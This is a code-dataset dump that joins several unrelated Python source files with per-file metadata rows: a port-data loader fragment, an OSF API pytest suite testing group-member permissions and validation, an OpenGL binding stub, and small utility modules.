ports_with_id['name'] = ports_with_id.apply(lambda x: create_port_names(x,ports_with_name),axis = 1)
ports_with_id['population'] = 0
ports_with_id['capacity'] = 1e9
ports_with_id = ports_with_id[['node_id','name','port_type','port_class','tons','population','capacity','geometry']]
return ports_with_id
def read_setor_nodes(node_file_with_ids,sector):
"""Create port data with attributes
Parameters
- ports_file_with_ids - String path of GeoDataFrame with port IDs
- sector - String path of sector
Returns
ports_with_id - GeoPandas DataFrame with port attributes
"""
# load data
add_columns = [('name',''),('tons',0),('population',0),('capacity',1e9)]
ports_with_id = gpd.read_file(node_file_with_ids, encoding='utf-8')
ports_with_id.columns = map(str.lower, ports_with_id.columns)
if sector == 'air':
ports_with_id.rename(columns={'ten': 'name'}, inplace=True)
for ac in add_columns:
if ac[0] not in ports_with_id.columns.values.tolist():
ports_with_id[ac[0]] = ac[1]
ports_with_id = ports_with_id[['node_id','name','tons','population','capacity','geometry']]
return ports_with_id
| 37.421292 | 127 | 0.670598 | 5,827 | 41,126 | 4.499571 | 0.060923 | 0.033563 | 0.016858 | 0.006865 | 0.820283 | 0.793318 | 0.778062 | 0.766887 | 0.734582 | 0.70201 | 0 | 0.012833 | 0.245879 | 41,126 | 1,098 | 128 | 37.455373 | 0.832559 | 0.388975 | 0 | 0.599174 | 0 | 0 | 0.099302 | 0.001009 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059917 | false | 0 | 0.016529 | 0 | 0.208678 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4a55659a3eb7beae33c6cf6c8edeb6517a35c90 | 30,485 | py | Python | api_tests/osf_groups/views/test_osf_group_members_list.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 628 | 2015-01-15T04:33:22.000Z | 2022-03-30T06:40:10.000Z | api_tests/osf_groups/views/test_osf_group_members_list.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 4,712 | 2015-01-02T01:41:53.000Z | 2022-03-30T14:18:40.000Z | api_tests/osf_groups/views/test_osf_group_members_list.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 371 | 2015-01-12T16:14:08.000Z | 2022-03-31T18:58:29.000Z | import pytest
from waffle.testutils import override_flag
from django.utils import timezone
from framework.auth.core import Auth
from api.base.settings.defaults import API_BASE
from osf.models import OSFUser
from osf.utils.permissions import MEMBER, MANAGE, MANAGER
from osf_tests.factories import (
AuthUserFactory,
OSFGroupFactory,
)
from osf.features import OSF_GROUPS
@pytest.fixture()
def user():
return AuthUserFactory()
@pytest.fixture()
def manager():
return AuthUserFactory()
@pytest.fixture()
def member():
return AuthUserFactory()
@pytest.fixture()
def old_name():
return 'Platform Team'
@pytest.fixture()
def user3(osf_group):
return AuthUserFactory()
@pytest.fixture()
def osf_group(manager, member, old_name):
group = OSFGroupFactory(name=old_name, creator=manager)
group.make_member(member)
return group
@pytest.fixture()
def url(osf_group):
return '/{}groups/{}/members/'.format(API_BASE, osf_group._id)
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestGroupMembersList:
def test_return_perms(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# test unauthenticated
res = app.get(url)
assert res.status_code == 200
# test user
res = app.get(url, auth=user.auth)
assert res.status_code == 200
# test member
res = app.get(url, auth=member.auth)
assert res.status_code == 200
# test manager
res = app.get(url, auth=manager.auth)
assert res.status_code == 200
# test invalid group
url = '/{}groups/{}/members/'.format(API_BASE, '12345_bad_id')
res = app.get(url, auth=manager.auth, expect_errors=True)
assert res.status_code == 404
def test_return_members(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
res = app.get(url)
data = res.json['data']
assert len(data) == 2
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, manager._id) in member_ids
assert '{}-{}'.format(osf_group._id, member._id) in member_ids
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersFilter:
def test_filtering(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# test filter members
url_filter = url + '?filter[role]=member'
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, member._id) in member_ids
# test filter managers
url_filter = url + '?filter[role]=manager'
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, manager._id) in member_ids
# test invalid role
url_filter = url + '?filter[role]=bad_role'
res = app.get(url_filter, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == "Value \'bad_role\' is not valid."
# test filter fullname
url_filter = url + '?filter[full_name]={}'.format(manager.fullname)
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, manager._id) in member_ids
# test filter fullname
url_filter = url + '?filter[full_name]={}'.format(member.fullname)
res = app.get(url_filter)
data = res.json['data']
assert len(data) == 1
member_ids = [mem['id'] for mem in data]
assert '{}-{}'.format(osf_group._id, member._id) in member_ids
# test invalid filter
url_filter = url + '?filter[created]=2018-02-01'
res = app.get(url_filter, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == "\'created\' is not a valid field for this endpoint."
def make_create_payload(role, user=None, full_name=None, email=None):
base_payload = {
'data': {
'type': 'group-members',
'attributes': {
'role': role
}
}
}
if user:
base_payload['data']['relationships'] = {
'users': {
'data': {
'id': user._id,
'type': 'users'
}
}
}
else:
if full_name:
base_payload['data']['attributes']['full_name'] = full_name
if email:
base_payload['data']['attributes']['email'] = email
return base_payload
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersCreate:
def test_create_manager(self, app, manager, user3, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload = make_create_payload(MANAGER, user3)
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['role'] == MANAGER
assert data['attributes']['full_name'] == user3.fullname
assert data['attributes']['unregistered_member'] is None
assert data['id'] == '{}-{}'.format(osf_group._id, user3._id)
assert user3._id in data['relationships']['users']['links']['related']['href']
assert osf_group.has_permission(user3, MANAGE) is True
def test_create_member(self, app, member, manager, user3, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload = make_create_payload(MEMBER, user3)
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['role'] == MEMBER
assert data['attributes']['full_name'] == user3.fullname
assert data['attributes']['unregistered_member'] is None
assert data['id'] == '{}-{}'.format(osf_group._id, user3._id)
assert data['id'] == '{}-{}'.format(osf_group._id, user3._id)
assert user3._id in data['relationships']['users']['links']['related']['href']
assert osf_group.has_permission(user3, MANAGE) is False
assert osf_group.has_permission(user3, MEMBER) is True
def test_add_unregistered_member(self, app, manager, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
full_name = 'Crazy 8s'
payload = make_create_payload(MEMBER, user=None, full_name=full_name, email='eight@cos.io')
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
data = res.json['data']
assert data['attributes']['role'] == MEMBER
user = OSFUser.load(data['id'].split('-')[1])
assert user._id in data['relationships']['users']['links']['related']['href']
assert osf_group.has_permission(user, MANAGE) is False
assert data['attributes']['full_name'] == full_name
assert data['attributes']['unregistered_member'] == full_name
assert osf_group.has_permission(user, MEMBER) is True
assert user in osf_group.members_only
assert user not in osf_group.managers
# test unregistered user is already a member
res = app.post_json_api(url, payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'User already exists.'
# test unregistered user email is blocked
payload['data']['attributes']['email'] = 'eight@example.com'
res = app.post_json_api(url, payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Email address domain is blocked.'
def test_create_member_perms(self, app, manager, member, osf_group, user3, url):
with override_flag(OSF_GROUPS, active=True):
payload = make_create_payload(MEMBER, user3)
# Unauthenticated
res = app.post_json_api(url, payload, expect_errors=True)
assert res.status_code == 401
# Logged in, nonmember
res = app.post_json_api(url, payload, auth=user3.auth, expect_errors=True)
assert res.status_code == 403
# Logged in, nonmanager
res = app.post_json_api(url, payload, auth=member.auth, expect_errors=True)
assert res.status_code == 403
def test_create_members_errors(self, app, manager, member, user3, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# invalid user
bad_user_payload = make_create_payload(MEMBER, user=user3)
bad_user_payload['data']['relationships']['users']['data']['id'] = 'bad_user_id'
res = app.post_json_api(url, bad_user_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == 'User with id bad_user_id not found.'
# invalid type
bad_type_payload = make_create_payload(MEMBER, user=user3)
bad_type_payload['data']['type'] = 'bad_type'
res = app.post_json_api(url, bad_type_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 409
# invalid role
bad_perm_payload = make_create_payload('bad_role', user=user3)
res = app.post_json_api(url, bad_perm_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'bad_role is not a valid role; choose manager or member.'
# fullname not included
unregistered_payload = make_create_payload(MEMBER, user=None, full_name=None, email='eight@cos.io')
res = app.post_json_api(url, unregistered_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
# email not included
unregistered_payload = make_create_payload(MEMBER, user=None, full_name='Crazy 8s', email=None)
res = app.post_json_api(url, unregistered_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
# user is already a member
existing_member_payload = make_create_payload(MEMBER, user=member)
res = app.post_json_api(url, existing_member_payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'User is already a member of this group.'
# Disabled user
user3.date_disabled = timezone.now()
user3.save()
payload = make_create_payload(MEMBER, user=user3)
res = app.post_json_api(url, payload, auth=manager.auth, expect_errors=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Deactivated users cannot be added to OSF Groups.'
# No role specified - given member by default
user3.date_disabled = None
user3.save()
payload = make_create_payload(MEMBER, user=user3)
payload['attributes'] = {}
res = app.post_json_api(url, payload, auth=manager.auth)
assert res.status_code == 201
assert res.json['data']['attributes']['role'] == MEMBER
assert osf_group.has_permission(user3, 'member')
assert not osf_group.has_permission(user3, 'manager')
def make_bulk_create_payload(role, user=None, full_name=None, email=None):
base_payload = {
'type': 'group-members',
'attributes': {
'role': role
}
}
if user:
base_payload['relationships'] = {
'users': {
'data': {
'id': user._id,
'type': 'users'
}
}
}
else:
if full_name:
base_payload['attributes']['full_name'] = full_name
if email:
base_payload['attributes']['email'] = email
return base_payload
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersBulkCreate:
def test_bulk_create_group_member_perms(self, app, url, manager, member, user, user3, osf_group):
with override_flag(OSF_GROUPS, active=True):
payload_user_three = make_bulk_create_payload(MANAGER, user3)
payload_user = make_bulk_create_payload(MEMBER, user)
bulk_payload = [payload_user_three, payload_user]
# unauthenticated
res = app.post_json_api(url, {'data': bulk_payload}, expect_errors=True, bulk=True)
assert res.status_code == 401
# non member
res = app.post_json_api(url, {'data': bulk_payload}, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# member
res = app.post_json_api(url, {'data': bulk_payload}, auth=member.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# manager
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, bulk=True)
assert res.status_code == 201
assert len(res.json['data']) == 2
assert osf_group.is_member(user) is True
assert osf_group.is_member(user3) is True
assert osf_group.is_manager(user) is False
assert osf_group.is_manager(user3) is True
def test_bulk_create_unregistered(self, app, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload_user = make_bulk_create_payload(MEMBER, user)
payload_unregistered = make_bulk_create_payload(MEMBER, user=None, full_name='Crazy 8s', email='eight@cos.io')
res = app.post_json_api(url, {'data': [payload_user, payload_unregistered]}, auth=manager.auth, bulk=True)
unreg_user = OSFUser.objects.get(username='eight@cos.io')
assert res.status_code == 201
ids = [user_data['id'] for user_data in res.json['data']]
roles = [user_data['attributes']['role'] for user_data in res.json['data']]
assert '{}-{}'.format(osf_group._id, user._id) in ids
assert '{}-{}'.format(osf_group._id, unreg_user._id) in ids
assert roles[0] == MEMBER
assert roles[1] == MEMBER
unregistered_names = [user_data['attributes']['unregistered_member'] for user_data in res.json['data']]
assert set(['Crazy 8s', None]) == set(unregistered_names)
assert osf_group.has_permission(user, MANAGE) is False
assert osf_group.has_permission(user, MEMBER) is True
assert osf_group.has_permission(unreg_user, MANAGE) is False
assert osf_group.has_permission(unreg_user, MEMBER) is True
assert osf_group.is_member(unreg_user) is True
assert osf_group.is_manager(unreg_user) is False
def test_bulk_create_group_member_errors(self, app, url, manager, member, user, user3, osf_group):
with override_flag(OSF_GROUPS, active=True):
payload_member = make_bulk_create_payload(MANAGER, member)
payload_user = make_bulk_create_payload(MANAGER, user)
# User in bulk payload is an invalid user
bad_user_payload = make_bulk_create_payload(MEMBER, user=user3)
bad_user_payload['relationships']['users']['data']['id'] = 'bad_user_id'
bulk_payload = [payload_user, bad_user_payload]
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == 'User with id bad_user_id not found.'
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
# User in bulk payload is invalid
bad_type_payload = make_bulk_create_payload(MEMBER, user=user3)
bad_type_payload['type'] = 'bad_type'
bulk_payload = [payload_user, bad_type_payload]
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 409
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
# User in bulk payload has invalid role specified
bad_role_payload = make_bulk_create_payload('bad_role', user=user3)
res = app.post_json_api(url, {'data': [payload_user, bad_role_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'bad_role is not a valid role; choose manager or member.'
assert osf_group.is_member(user3) is False
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user3) is False
assert osf_group.is_manager(user) is False
# fullname not included
unregistered_payload = make_bulk_create_payload(MEMBER, user=None, full_name=None, email='eight@cos.io')
res = app.post_json_api(url, {'data': [payload_user, unregistered_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
# email not included
unregistered_payload = make_bulk_create_payload(MEMBER, user=None, full_name='Crazy 8s', email=None)
res = app.post_json_api(url, {'data': [payload_user, unregistered_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'You must provide a full_name/email combination to add an unconfirmed member.'
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
# Member of bulk payload is already a member
bulk_payload = [payload_member, payload_user]
res = app.post_json_api(url, {'data': bulk_payload}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'User is already a member of this group.'
assert osf_group.is_member(member) is True
assert osf_group.is_member(user) is False
assert osf_group.is_manager(member) is False
assert osf_group.is_manager(user) is False
# Disabled user
user3.date_disabled = timezone.now()
user3.save()
payload = make_bulk_create_payload(MEMBER, user=user3)
res = app.post_json_api(url, {'data': [payload_user, payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Deactivated users cannot be added to OSF Groups.'
# No role specified, given member by default
user3.date_disabled = None
user3.save()
payload = make_bulk_create_payload(MEMBER, user=user3)
payload['attributes'] = {}
res = app.post_json_api(url, {'data': [payload_user, payload]}, auth=manager.auth, bulk=True)
assert res.status_code == 201
assert len(res.json['data']) == 2
ids = [user_data['id'] for user_data in res.json['data']]
assert '{}-{}'.format(osf_group._id, user._id) in ids
assert '{}-{}'.format(osf_group._id, user3._id) in ids
assert osf_group.is_member(user3) is True
assert osf_group.is_member(user) is True
assert osf_group.is_manager(user3) is False
assert osf_group.is_manager(user) is True
def build_bulk_update_payload(group_id, user_id, role):
return {
'id': '{}-{}'.format(group_id, user_id),
'type': 'group-members',
'attributes': {
'role': role
}
}
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersBulkUpdate:
def test_update_role(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
payload = build_bulk_update_payload(osf_group._id, member._id, MANAGER)
bulk_payload = {'data': [payload]}
# test unauthenticated
res = app.patch_json_api(url, bulk_payload, expect_errors=True, bulk=True)
assert res.status_code == 401
# test user
res = app.patch_json_api(url, bulk_payload, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test member
res = app.patch_json_api(url, bulk_payload, auth=member.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test manager
res = app.patch_json_api(url, bulk_payload, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 200
assert res.json['data'][0]['attributes']['role'] == MANAGER
assert res.json['data'][0]['attributes']['full_name'] == member.fullname
assert res.json['data'][0]['id'] == '{}-{}'.format(osf_group._id, member._id)
payload = build_bulk_update_payload(osf_group._id, member._id, MEMBER)
bulk_payload = {'data': [payload]}
res = app.patch_json_api(url, bulk_payload, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 200
assert res.json['data'][0]['attributes']['role'] == MEMBER
assert res.json['data'][0]['attributes']['full_name'] == member.fullname
assert res.json['data'][0]['id'] == '{}-{}'.format(osf_group._id, member._id)
def test_bulk_update_errors(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# id not in payload
payload = {
'type': 'group-members',
'attributes': {
'role': MEMBER
}
}
bulk_payload = {'data': [payload]}
res = app.patch_json_api(url, bulk_payload, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Member identifier not provided.'
# test improperly formatted id
payload = build_bulk_update_payload(osf_group._id, member._id, MANAGER)
payload['id'] = 'abcde'
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Member identifier incorrectly formatted.'
# test improper type
payload = build_bulk_update_payload(osf_group._id, member._id, MANAGER)
payload['type'] = 'bad_type'
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 409
# test invalid role
payload = build_bulk_update_payload(osf_group._id, member._id, 'bad_perm')
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'bad_perm is not a valid role; choose manager or member.'
# test user is not a member
payload = build_bulk_update_payload(osf_group._id, user._id, MEMBER)
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Could not find all objects to update.'
# test cannot downgrade remaining manager
payload = build_bulk_update_payload(osf_group._id, manager._id, MEMBER)
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
# test cannot remove last confirmed manager
osf_group.add_unregistered_member('Crazy 8s', 'eight@cos.io', Auth(manager), MANAGER)
assert len(osf_group.managers) == 2
res = app.patch_json_api(url, {'data': [payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
def create_bulk_delete_payload(group_id, user_id):
return {
'id': '{}-{}'.format(group_id, user_id),
'type': 'group-members'
}
@pytest.mark.django_db
@pytest.mark.enable_quickfiles_creation
class TestOSFGroupMembersBulkDelete:
def test_delete_perms(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
member_payload = create_bulk_delete_payload(osf_group._id, member._id)
bulk_payload = {'data': [member_payload]}
# test unauthenticated
res = app.delete_json_api(url, bulk_payload, expect_errors=True, bulk=True)
assert res.status_code == 401
# test user
res = app.delete_json_api(url, bulk_payload, auth=user.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test member
res = app.delete_json_api(url, bulk_payload, auth=member.auth, expect_errors=True, bulk=True)
assert res.status_code == 403
# test manager
assert osf_group.is_member(member) is True
assert osf_group.is_manager(member) is False
res = app.delete_json_api(url, bulk_payload, auth=manager.auth, bulk=True)
assert res.status_code == 204
assert osf_group.is_member(member) is False
assert osf_group.is_manager(member) is False
# test user does not belong to OSF Group
osf_group.make_manager(user)
assert osf_group.is_member(user) is True
assert osf_group.is_manager(user) is True
user_payload = create_bulk_delete_payload(osf_group._id, user._id)
bulk_payload = {'data': [user_payload, member_payload]}
res = app.delete_json_api(url, bulk_payload, auth=user.auth, bulk=True, expect_errors=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == '{} cannot be found in this OSFGroup'.format(member._id)
# test bulk delete manager (not last one)
osf_group.make_manager(user)
assert osf_group.is_member(user) is True
assert osf_group.is_manager(user) is True
user_payload = create_bulk_delete_payload(osf_group._id, user._id)
bulk_payload = {'data': [user_payload]}
res = app.delete_json_api(url, bulk_payload, auth=user.auth, bulk=True)
assert res.status_code == 204
assert osf_group.is_member(user) is False
assert osf_group.is_manager(user) is False
def test_delete_errors(self, app, member, manager, user, osf_group, url):
with override_flag(OSF_GROUPS, active=True):
# test invalid user
invalid_payload = create_bulk_delete_payload(osf_group._id, '12345')
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Could not find all objects to delete.'
# test user does not belong to group
invalid_payload = create_bulk_delete_payload(osf_group._id, user._id)
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 404
assert res.json['errors'][0]['detail'] == '{} cannot be found in this OSFGroup'.format(user._id)
# test user is last manager
invalid_payload = create_bulk_delete_payload(osf_group._id, manager._id)
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
# test user is last registered manager
osf_group.add_unregistered_member('Crazy 8s', 'eight@cos.io', Auth(manager), MANAGER)
assert len(osf_group.managers) == 2
res = app.delete_json_api(url, {'data': [invalid_payload]}, auth=manager.auth, expect_errors=True, bulk=True)
assert res.status_code == 400
assert res.json['errors'][0]['detail'] == 'Group must have at least one manager.'
| 48.159558 | 138 | 0.62142 | 3,865 | 30,485 | 4.679431 | 0.05511 | 0.04556 | 0.048104 | 0.060931 | 0.855247 | 0.811622 | 0.78851 | 0.75998 | 0.72863 | 0.697224 | 0 | 0.013055 | 0.263802 | 30,485 | 632 | 139 | 48.235759 | 0.792808 | 0.04271 | 0 | 0.606186 | 0 | 0 | 0.106815 | 0.005288 | 0 | 0 | 0 | 0 | 0.36701 | 1 | 0.053608 | false | 0 | 0.018557 | 0.016495 | 0.107216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4b39153a89ae94a6412365ffcfe98a2636e9c7a | 150 | py | Python | OpenGLCffi/GL/EXT/ARB/cl_event.py | cydenix/OpenGLCffi | c78f51ae5e6b655eb2ea98f072771cf69e2197f3 | [
"MIT"
] | null | null | null | OpenGLCffi/GL/EXT/ARB/cl_event.py | cydenix/OpenGLCffi | c78f51ae5e6b655eb2ea98f072771cf69e2197f3 | [
"MIT"
] | null | null | null | OpenGLCffi/GL/EXT/ARB/cl_event.py | cydenix/OpenGLCffi | c78f51ae5e6b655eb2ea98f072771cf69e2197f3 | [
"MIT"
] | null | null | null | from OpenGLCffi.GL import params
@params(api='gl', prms=['context', 'event', 'flags'])
def glCreateSyncFromCLeventARB(context, event, flags):
pass
| 21.428571 | 54 | 0.733333 | 18 | 150 | 6.111111 | 0.722222 | 0.218182 | 0.309091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 150 | 6 | 55 | 25 | 0.820896 | 0 | 0 | 0 | 0 | 0 | 0.128378 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
d4c28b9248be7fb8ff32d2a2a06b195bfe772f12 | 21 | py | Python | h5Nastran/f06/tables/__init__.py | mjredmond/mrNastran | 4fa57c16e93622ad8be3fb2ed221415ed25c5635 | [
"BSD-3-Clause"
] | 3 | 2017-12-02T05:13:05.000Z | 2017-12-07T04:34:13.000Z | h5Nastran/f06/tables/__init__.py | mjredmond/mrNastran | 4fa57c16e93622ad8be3fb2ed221415ed25c5635 | [
"BSD-3-Clause"
] | null | null | null | h5Nastran/f06/tables/__init__.py | mjredmond/mrNastran | 4fa57c16e93622ad8be3fb2ed221415ed25c5635 | [
"BSD-3-Clause"
] | null | null | null | from . import nodal
| 10.5 | 20 | 0.714286 | 3 | 21 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.238095 | 21 | 1 | 21 | 21 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d4d698a9b73884c023f65cf8861a8c7d67af3152 | 71 | py | Python | triangleArea.py | suyag/Unity.Library.eppz.Geometry | edd32571761100093902339773dd966ae690f9ef | [
"MIT"
] | null | null | null | triangleArea.py | suyag/Unity.Library.eppz.Geometry | edd32571761100093902339773dd966ae690f9ef | [
"MIT"
] | null | null | null | triangleArea.py | suyag/Unity.Library.eppz.Geometry | edd32571761100093902339773dd966ae690f9ef | [
"MIT"
] | null | null | null |
import math
def AreaOfTriangle(a,b,C):
return a*b*math.sin(C)/2 | 17.75 | 28 | 0.661972 | 14 | 71 | 3.357143 | 0.714286 | 0.085106 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 0.183099 | 71 | 4 | 28 | 17.75 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
d4e6692add9b8ceaaa62b77279450d04787a05ee | 60 | py | Python | main/views/public/contact/__init__.py | tiberiucorbu/av-website | f26f44a367d718316442506b130a7034697670b8 | [
"MIT"
] | null | null | null | main/views/public/contact/__init__.py | tiberiucorbu/av-website | f26f44a367d718316442506b130a7034697670b8 | [
"MIT"
] | null | null | null | main/views/public/contact/__init__.py | tiberiucorbu/av-website | f26f44a367d718316442506b130a7034697670b8 | [
"MIT"
] | null | null | null | from contact_form import *
from contact_controller import *
| 20 | 32 | 0.833333 | 8 | 60 | 6 | 0.625 | 0.458333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 60 | 2 | 33 | 30 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
